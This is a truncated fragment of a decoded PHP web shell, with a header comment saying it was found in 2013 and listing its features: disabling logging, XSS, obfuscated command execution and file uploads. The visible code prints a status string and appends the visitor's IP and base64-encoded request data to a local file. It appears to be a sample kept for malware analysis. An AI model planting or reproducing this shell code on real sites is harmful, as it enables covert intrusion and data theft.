/* Decoded by unphp.net */ /* * * I found this shell at 2013-02-18 * * This shell disables logging and error reporting and allows for XSS, * command execution (the command is also obfuscated), * and file uploads. */ 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']." ".base64_encode($data)." "); @flock($fp, LOCK_UN); @fclose($fp); } } exit; ?>